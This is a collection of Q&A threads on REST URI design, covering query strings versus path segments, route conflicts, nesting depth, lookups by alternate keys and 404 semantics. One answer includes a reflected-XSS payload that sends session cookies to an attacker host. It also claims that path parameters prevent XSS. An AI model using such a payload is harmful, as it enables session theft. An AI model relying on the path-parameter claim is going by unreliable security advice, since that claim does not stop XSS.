Is it still REST if we identify resources with URLs which contain query string components?

1) I assume the query string component of a URL is also considered part of the identity of a resource?
2) If it is indeed considered part of the identity, are there any reasons why in REST we can't/shouldn't identify resources with URLs which contain query string components?
Thank you

If the resource you are addressing with a URL represents a collection of resources, like http://yourdomain.com/customers, it's a valid RESTful way to filter the result with query parameters:
http://yourdomain.com/customers?minSalary=2000&maxAge=50
So yes, query-parameters are meaningful for identifying resources.
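To make the filtering idea concrete, here is a minimal sketch in Python. The in-memory CUSTOMERS list, its field names, and the filter_customers helper are assumptions made up for illustration; only the URL and the minSalary/maxAge parameter names come from the example above.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical in-memory data standing in for the /customers collection.
CUSTOMERS = [
    {"name": "Ann", "salary": 2500, "age": 41},
    {"name": "Bob", "salary": 1800, "age": 35},
    {"name": "Cid", "salary": 3000, "age": 62},
]

def filter_customers(url):
    """Return the customers matching the optional minSalary/maxAge parameters."""
    params = parse_qs(urlsplit(url).query)
    min_salary = int(params.get("minSalary", ["0"])[0])
    max_age_values = params.get("maxAge")
    max_age = int(max_age_values[0]) if max_age_values else None
    return [
        c for c in CUSTOMERS
        if c["salary"] >= min_salary and (max_age is None or c["age"] <= max_age)
    ]

if __name__ == "__main__":
    url = "http://yourdomain.com/customers?minSalary=2000&maxAge=50"
    print(filter_customers(url))
```

Without any query string the same function returns the whole collection, which matches the idea that the query only narrows down what the path already identifies.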

I think your root question is about using a query that would return a unique item.
/orders?ID=8
which would be the same resource as
/order/8
So there we have two URIs for the same resource. You might be asking whether that is OK, and it is perfectly fine to have multiple URIs for the same resource. Generally you should link to the more 'canonical' URI, the shortest 'path' (hierarchically speaking) to a resource.
You generally shouldn't rely on query parameters, as doing so tends to lead to awkward API designs. For example, if you want to know all the orders made by bob, you might be tempted to think "well, I'm filtering the orders" and so do
/orders?users=bob
Whereas a better way of thinking is "I want all users, just bob, just his orders", so you would instead do
/users/bob/orders
This is a simple URI that you would be able to link to from the 'user resource' for bob. Sadly, though, this second approach can get a bit awkward when you want to, say, look at orders from multiple users
/users/jack,jill,alice,bob/orders
It's workable, but very odd looking.

Related

Conflicting REST urls

So I'm building a REST api and need to make some urls. The problem is, I'm running into some conflicting paths. For example:
GET <type>/<id> gets the details of an object of a given type and id
GET <type>/summary gets the summary of objects of a given type
This simplified example shows a problem occurs when an object has id "summary". What is the best way to solve this? From a REST puritan perspective, what should be the solution?
Here's some of my ideas:
Put the <id> in query parameters. From what I understand this is against standards
Put a keyword at the start of the url. Also against standards?
Disallow certain id values. Not something I want to enforce for all my users and use cases and different entrances into my system
I may have an alternative to this. What if we have both book as well as the plural books? Then you can have:
/book/{id}
and
/books/summary
or
/books/count
The URL structure is not quite right to begin with so it's difficult to solve it in a clean way.
For the sake of discussion, let's assume <type> is a books resource. So the first URL is fine - you get a book of the given ID:
GET /books/<id>
However this is not:
GET /books/summary
Because it's a bespoke URL, which I guess has a use in your application but is not restful. A GET call should return one or more resources. However a "summary" is not a resource, it's a property of a resource and that's why you end up in this situation of having IDs mixed up with book properties.
So your best option would be to change this URL to something like this:
GET /books?fields=summary
By default GET /books would return all the resources, while GET /books?fields=<list_of_fields> will return the books but with only the chosen properties.
That will be similar to your previous URL but without the ID/property conflict, and will also allow you later on to retrieve resources with specific fields (without having to create new custom URLs).
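A rough sketch of how such a fields parameter could be handled, in Python. The BOOKS data and the list_books function are hypothetical; the comma-separated format of the field list is also an assumption, since the answer only says "list_of_fields".

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical book records; the field names are made up for illustration.
BOOKS = [
    {"id": "1", "title": "Dune", "summary": "Desert planet politics."},
    {"id": "2", "title": "Emma", "summary": "A matchmaker misjudges."},
]

def list_books(url):
    """Return all books, restricted to the requested fields if ?fields= is given."""
    params = parse_qs(urlsplit(url).query)
    if "fields" not in params:
        return BOOKS
    # Assumption: fields are comma-separated, e.g. ?fields=title,summary
    wanted = [name for name in params["fields"][0].split(",") if name]
    return [{k: book[k] for k in wanted if k in book} for book in BOOKS]

if __name__ == "__main__":
    print(list_books("/books?fields=summary"))
```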
Edit:
Regarding the count of books, it's still useful to reason in terms of resources. /books gives you one or more books, but it should not be used for meta-information about the collection, such as count, but also things like "most read book", or "books that start with the letter 'A'", etc. as that will make the resource more and more complex and difficult to maintain.
Depending on what you want to achieve I think there'd be two solutions:
Create a new resource that manages the collection of books. For example:
GET /bookcase
And that will give you information about the collection, for example:
{
"count": 1234,
"most_read": "<isbn>",
// etc. - any information that might be needed about the book collection
}
Or a search engine. You create a resource such as:
GET /book_search_engine/?query=
which would return a search result such as:
{
"count": 123,
"books": [
// Books that match the query
]
}
then a query like this would give you just the count:
// Search all the books, but provide only the "count" field
GET /book_search_engine/?query=*&fields=count
Obviously that's a more involved solution and maybe not necessary for a simple REST API, however it can be useful as it makes it easier to create queries specific to a client.
This simplified example shows a problem occurs when an object has id "summary". What is the best way to solve this? From a REST puritan perspective, what should be the solution?
As far as REST is concerned, the URI are opaque. Spelling is absolutely irrelevant. You could use URI like
/a575cc90-2878-41fe-9eec-f420a509e1f0
/f871fff6-4c4e-48f7-83a4-26858fdb3096
and as far as REST is concerned, that's spot on. See Stefan Tilkov's talk REST: I Don't Think It Means What You Think It Does.
What you are asking about is URI design, how to adapt conventions/best practices to your particular setting.
One thing that will help is to recognize that summary is a resource, in the REST/HTTP sense -- it is a document that can be represented as a byte sequence. All you need to do is figure out where that resource belongs (according to your local spelling conventions).
Continuing to borrow the "books" example used by others
# Here's the familiar "URI that identifies a member of the books collection"
/books/<id>
# Here's the summary of the /books collection
/summaries/books
Put the <id> in query parameters. From what I understand this is against standards
Not as much as you might think. REST doesn't care. The URI spec expresses some views about hierarchical vs non hierarchical data. HTTP supports the notion of a redirect, where one resource can reference another.
GET /books?id=12345
302 Found
Location: /books/12345
You also have options for skipping a round trip, by returning the representation you want immediately, taking advantage of Content-Location
GET /books?summary
200 OK
Content-Location: /summaries/books
...
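The two exchanges above could be sketched server-side roughly as follows, in Python. The handle_get function and its (status, headers) return shape are hypothetical and not tied to any framework; only the paths, status codes, and header names come from the examples.

```python
from urllib.parse import urlsplit, parse_qs

def handle_get(url):
    """Return (status, headers) for the two lookups shown above."""
    parts = urlsplit(url)
    # keep_blank_values=True so that a bare "?summary" is still seen as a key.
    params = parse_qs(parts.query, keep_blank_values=True)
    if parts.path == "/books" and "id" in params:
        # Redirect the query-style URI to the path-style one.
        return 302, {"Location": "/books/" + params["id"][0]}
    if parts.path == "/books" and "summary" in params:
        # Answer immediately, but tell the client where the representation lives.
        return 200, {"Content-Location": "/summaries/books"}
    return 404, {}

if __name__ == "__main__":
    print(handle_get("/books?id=12345"))
    print(handle_get("/books?summary"))
```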
I have the same issue. And all the solutions seem a little off b/c REST best practices seem to suggest none of them are ideal.
You could have just one off-limit id, like all.
GET <type>/<id>
GET <type>/all/summary
It might even be possible to use a single symbol instead, such as ~ or _.
GET <type>/<id>
GET <type>/~/summary
How satisfying this solution seems is of course very subjective.
The singular/plural approach seems more elegant to me, despite most REST best practice guides saying not to do this. Unfortunately, some words don't have distinct singular and plural forms.
This isn't perfectly conventional for how some like to define their REST endpoints.
But I would enforce a pattern where "id" cannot be just any string. Instead I would use a UUID and define my routes as such.
GET /books/{id:uuid}
GET /books/{id:uuid}/summary
And if you really want a verb in the URL without an identifier it is still technically possible because we know the {id:uuid} in the path must conform to the uuid pattern.
With that GET /books/summary is still distinct from GET /books/{id:uuid}
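The {id:uuid} notation above belongs to whatever routing framework is in use. As a framework-free sketch of the same idea in Python, a regular expression can play the role of the uuid constraint. The route names and the resolve helper are hypothetical.

```python
import re

# Pattern for the textual form of a UUID (8-4-4-4-12 hex digits).
UUID_SEGMENT = r"[0-9a-fA-F]{8}-(?:[0-9a-fA-F]{4}-){3}[0-9a-fA-F]{12}"

# Hypothetical route table: (compiled pattern, handler name).
ROUTES = [
    (re.compile(r"^/books/summary$"), "collection_summary"),
    (re.compile(rf"^/books/(?P<id>{UUID_SEGMENT})$"), "book_detail"),
    (re.compile(rf"^/books/(?P<id>{UUID_SEGMENT})/summary$"), "book_summary"),
]

def resolve(path):
    """Return (handler name, path parameters), or (None, {}) if nothing matches."""
    for pattern, name in ROUTES:
        match = pattern.match(path)
        if match:
            return name, match.groupdict()
    return None, {}

if __name__ == "__main__":
    print(resolve("/books/summary"))
    print(resolve("/books/a575cc90-2878-41fe-9eec-f420a509e1f0"))
    print(resolve("/books/not-a-uuid"))
```

Because "summary" can never match the UUID pattern, the order of the routes does not matter here.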

URI of REST to reflect relationship of resources?

I know some naming conventions of REST APIs, for example that resource names should be plural, that different HTTP methods are used with the same URI to perform different actions on that resource, etc.
But as the URI should reflect the relationship of resources, I am a little confused. Take SO as an example: when updating an existing comment on an answer, the URI should look like:
PUT /{contextPath}/questions/{questionId}/answers/{answerId}/comments/{commentId}
But I feel awkward when using this so-called standard URI because:
It's a little verbose, especially when the hierarchy is very deep.
questionId and answerId are completely unnecessary here, since commentId is sufficient for the server to identify a comment record.
So what's the appropriate way to deal with this? Should I always follow the naming conventions, or make some changes when the relationship hierarchy of resources is very deep?
I emphatically disagree that "URI should reflect relationship of resources".
URIs are pointers to resources. That's it. There are conventions for making them human-readable, and therefore easier to work with. There is certainly no hard-and-fast rule that relationships should be modeled on the URI path. Feel free to model resources in a flat, rather than hierarchical manner. Use links to model relationships between the resources, and query parameters to narrow down collections.
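As an illustration of "flat URIs plus links", here is a small Python sketch of what a comment representation might look like. The field names, the "links" key, and the URI shapes are all assumptions for the example, not a standard format.

```python
def comment_representation(comment):
    """Build a flat comment representation that links to its related resources."""
    return {
        "id": comment["id"],
        "text": comment["text"],
        # Relationships are expressed as links rather than encoded in the path.
        "links": {
            "self": f"/comments/{comment['id']}",
            "answer": f"/answers/{comment['answer_id']}",
            "question": f"/questions/{comment['question_id']}",
        },
    }

if __name__ == "__main__":
    row = {"id": 7, "text": "Nice answer", "answer_id": 3, "question_id": 1}
    print(comment_representation(row))
```

A client that needs the parent answer or question follows the link instead of reconstructing a nested path.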
The hierarchical URI gives you more options without having to make extra requests.
It allows you to call functions that might require, say, a questionId.
When you only have the commentId, you first have to query for the questionId.
It depends on what your functions require. If you had specific info on the previous page and have to use it again on the next, why query it twice? Unless it is sensitive, which a questionId clearly is not.
That's my opinion on how you should look at your adoption of the standard.
I would simplify the route/URI to:
PUT /comments/{commentId}
along with the corresponding RequestBody, perhaps some sort of DTO.
The URI should not have to show the hierarchy all the way from the context path. It can be the shortest URI that can uniquely identify the resource.

Rest 'guidelines' make the API design difficult

I am trying to create an API for my REST services and I am struggling with the design rules that I try to follow. In general I am trying to follow (among others) these guidelines:
Don't use verbs in the URIs
Don't use query parameters when altering states
Use plural
Don't use camel case
Now, I have to model something like the following:
Get all departments of a company
Get a department of a company
Delete all departments of a company
Delete a department of a company
I am trying something like this:
GET company/departments
GET company/departments/<depName>
DELETE company/departments
DELETE company/departments {body: department name}
The above follows the guidelines that I have mentioned, but I really don't think that the resulting URIs are good. The fourth in particular does a different job yet has the same URI as the third.
This is a common problem for me, and I encounter it many times when I am designing REST services. The result is that I always break some design principles to achieve what I want, or make uglier URIs (for example: DELETE company/departments/department).
So the actual question is:
In my design, how can I delete a single department with a RESTful URI?
A URL consists of several parts:
http://example.com/company/departments/12345?arg1=this&arg2=that
http: is the scheme. //example.com is the host. /company/departments/12345 is the path, ?arg1=this&arg2=that is the query string, consisting of two parameters: arg1 and arg2. There's another aspect, called matrix arguments, which won't be discussed here.
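For reference, the same decomposition can be reproduced with Python's standard urllib.parse module. This is only a demonstration of how the parts are named; nothing in it is specific to REST.

```python
from urllib.parse import urlsplit, parse_qs

parts = urlsplit("http://example.com/company/departments/12345?arg1=this&arg2=that")

print(parts.scheme)           # http
print(parts.netloc)           # example.com
print(parts.path)             # /company/departments/12345
print(parts.query)            # arg1=this&arg2=that
print(parse_qs(parts.query))  # {'arg1': ['this'], 'arg2': ['that']}
```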
When REST talks about URLs, it refers to the entire thing. Not parts of it. To REST the entire URL is treated as an opaque blob.
That means REST doesn't care about any particular part: the scheme, the host, the path, or the arguments.
ftp://127.0.0.1/E280F814-1524-41D5-8735-43D8414AE242 is a perfectly fine URL as far as REST is concerned.
So as far as REST is concerned, it doesn't give a rip what path you use in your URL or whether you use parameters or not.
That said, the recommendation against parameters in a URL exists because some caches don't cache parameterized URLs properly. Thus the preference for /company/department/12345 over /company/department?id=12345.
The 12345 in the path is not a parameter. It's the name of the resource. Just like starwars.mp4 above is not a parameter, nor is E280F814-1524-41D5-8735-43D8414AE242. They're just names. The only folks that actually care are people. The computer doesn't care, the internet doesn't care, REST doesn't care. To them, it's just all bits.
So it sounds like a simple miscommunication that you're fighting. Try not to stress over it too much. Too much weight is pressed on URL naming anyway, when it's the resources and their representations that actually matter.
A better design for RESTful URIs is to use an identifier for the resource. In this case the resource is the department.
So your URIs could be like the following:
GET company/departments
GET company/departments/<department-id>
DELETE company/departments
DELETE company/departments/<department-id>
For example...
DELETE company/departments/58491
By using an identifier, rather than the department name, this avoids spaces in your URIs, which are undesirable. By department name, I assume you meant the user-friendly display name, such as "Human Capital Management."
I agree. You should use a URL like the one below to delete a department. Such a URL identifies a department and can be used to execute HTTP operations on it. Don't provide the department id or name within the payload of the request.
DELETE company/departments/58491
The following link could give you some more details about designing a RESTful service: https://templth.wordpress.com/2014/12/15/designing-a-web-api/.
Hope it helps you,
Thierry

RESTful url to GET resource by different fields

Simple question I'm having trouble finding an answer to..
If I have a REST web service, and my design is not using url parameters, how can I specify two different keys to return the same resource by?
Example
I want (and have already implemented)
/Person/{ID}
which returns a person as expected.
Now I also want
/Person/{Name}
which returns a person by name.
Is this the correct RESTful format? Or is it something like:
/Person/Name/{Name}
You should only use one URI to refer to a single resource. Having multiple URIs will only cause confusion. In your example, confusion would arise due to two people having the same name. Which person resource are they referring to then?
That said, you can have multiple URIs refer to a single resource, but for anything other than the "true" URI you should simply redirect the client to the right place using a status code of 301 - Moved Permanently.
Personally, I would never implement a multi-ID scheme or redirection to support it. Pick a single identification scheme and stick with it. The users of your API will thank you.
What you really need to build is a query API, so focus on how you would implement something like a /personFinder resource which could take a name as a parameter and return potentially multiple matching /person/{ID} URIs in the response.
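A minimal Python sketch of such a finder resource follows. The PEOPLE table, the name query parameter, and the person_finder function are hypothetical; the point is only that a name lookup returns a list of /person/{ID} URIs, possibly more than one.

```python
from urllib.parse import urlsplit, parse_qs

# Hypothetical data: person ID -> name. Two people share a name on purpose.
PEOPLE = {"17": "Ann Lee", "23": "Bob Ray", "42": "Ann Lee"}

def person_finder(url):
    """Return the URIs of all people whose name matches the ?name= parameter."""
    params = parse_qs(urlsplit(url).query)
    name = params.get("name", [""])[0]
    return [f"/person/{pid}" for pid, n in sorted(PEOPLE.items()) if n == name]

if __name__ == "__main__":
    print(person_finder("/personFinder?name=Ann+Lee"))
```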
I guess technically you could have both URIs point to the same resource (perhaps with one of them as the canonical resource) but I think you wouldn't want to do this from an implementation perspective. What if there is an overlap between IDs and names?
It sure does seem like a good place to use query parameters, but if you insist on not doing so, perhaps you could do
person/{ID}
and
personByName/{Name}
I generally agree with this answer that for clarity and consistency it'd be best to avoid multiple ids pointing to the same entity.
Sometimes however, such a situation arises naturally. An example I work with is Polish companies, which can be identified by their tax id ('NIP' number) or by their national business registry id ('KRS' number).
In such case, I think one should first add the secondary id as a criterion to the search endpoint. Thus users will be able to "translate" between secondary id and primary id.
However, if users still keep insisting on being able to retrieve an entity directly by the secondary id (as we experienced), one other possibility is to provide a "secret" URL, not described in the documentation, performing such an operation. This can be given to users who made the effort to ask for it, and the potential ambiguity and confusion is then on them, if they decide to use it, not on everyone reading the documentation.
In terms of ambiguity and confusion for the API maintainer, I think this can be kept reasonably minimal with a helper function to immediately detect and translate the secondary id to primary id at the beginning of each relevant API endpoint.
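Such a helper might look like the following Python sketch. The lookup table, the identifier formats, and the function names are made up for illustration; a real implementation would presumably query the same store as the search endpoint.

```python
# Hypothetical mapping from secondary id to primary id.
SECONDARY_TO_PRIMARY = {"S-1001": "P-1", "S-1002": "P-2"}

def to_primary_id(identifier):
    """Translate a secondary id to its primary id; pass anything else through."""
    return SECONDARY_TO_PRIMARY.get(identifier, identifier)

def get_company(identifier):
    """Example endpoint body: normalise the id first, then proceed as usual."""
    primary_id = to_primary_id(identifier)
    return {"id": primary_id}

if __name__ == "__main__":
    print(get_company("S-1001"))
    print(get_company("P-2"))
```

This only works cleanly if the two id formats cannot collide, which is the overlap concern raised earlier in the thread.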
It obviously matters much less than normal what scheme is chosen for the secret URL.

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396:
The query component is a string of information to be interpreted by the resource.
This line was later changed in RFC 3986 to be:
The query component contains non-hierarchical data that, along with data in the path component (Section 3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST APIs, example #1 is more correct. Resources are represented as URIs, and #1 does that better. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xxheua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
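The difference between the two use cases can be sketched in Python as two handlers with different "not found" behaviour. The PRODUCTS data and both function names are hypothetical.

```python
# Hypothetical product catalogue keyed by product code.
PRODUCTS = {
    "4xxheua": {"code": "4xxheua", "size": "large", "color": "red"},
    "9zzkqpt": {"code": "9zzkqpt", "size": "small", "color": "red"},
}

def get_product(code):
    """Use case 1: /products/<code>. A missing product is a 404."""
    product = PRODUCTS.get(code)
    if product is None:
        return 404, None
    return 200, product

def search_products(**criteria):
    """Use case 2: /products?size=...&color=... An empty result is still a 200."""
    matches = [
        p for p in PRODUCTS.values()
        if all(p.get(key) == value for key, value in criteria.items())
    ]
    return 200, matches

if __name__ == "__main__":
    print(get_product("nope"))
    print(search_products(size="large", color="blue"))
```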
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. A URL like http://localhost/findbyproductcode only says "I want to retrieve something by product code", but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. A big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example, watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheua ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is dedicated to which approach is cleaner. But I want to focus on a different aspect: security. When I started working intensively on application security, I found out that a reflected XSS attack can be successfully prevented by using PathParams (approach 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the HTML source to the client. Unfortunately some applications will do that, and this is why PathParams may prevent XSS attacks.)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all be specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
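To illustrate why optional fields map naturally onto a query string, here is a Python sketch that turns whichever parameters are present into a parameterised WHERE clause. The field names in ALLOWED_FIELDS and the build_where function are hypothetical, and the "?" placeholder style is the one used by sqlite3; other drivers use different placeholders.

```python
from urllib.parse import parse_qs

# Hypothetical whitelist of searchable columns; anything else is ignored.
ALLOWED_FIELDS = ("size", "color", "brand")

def build_where(query_string):
    """Return (where_clause, values) for the optional fields that are present."""
    params = parse_qs(query_string)
    clauses, values = [], []
    for field in ALLOWED_FIELDS:
        if field in params:
            # Column names come from the whitelist; values are bound separately.
            clauses.append(f"{field} = ?")
            values.append(params[field][0])
    where = " AND ".join(clauses) if clauses else "1 = 1"
    return where, values

if __name__ == "__main__":
    print(build_where("color=red&size=large"))
    print(build_where(""))
```

Any subset of the fields can be supplied in any order, which is exactly what a fixed path hierarchy makes awkward.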
For the REST client, the URI structure does not matter, because it follows links annotated with semantics and never parses the URI.
For the developer who writes the routing logic and the link generation logic, and who probably wants to understand logs by checking the URLs, the URI structure does matter. In REST we map URIs to resources and not to operations (Fielding dissertation / uniform interface / identification of resources).
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "when reducing the collection to a single resource using a unique identifier, the unique identifier must always be part of the path and not the query". This is just what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, a properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote McDonald's server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.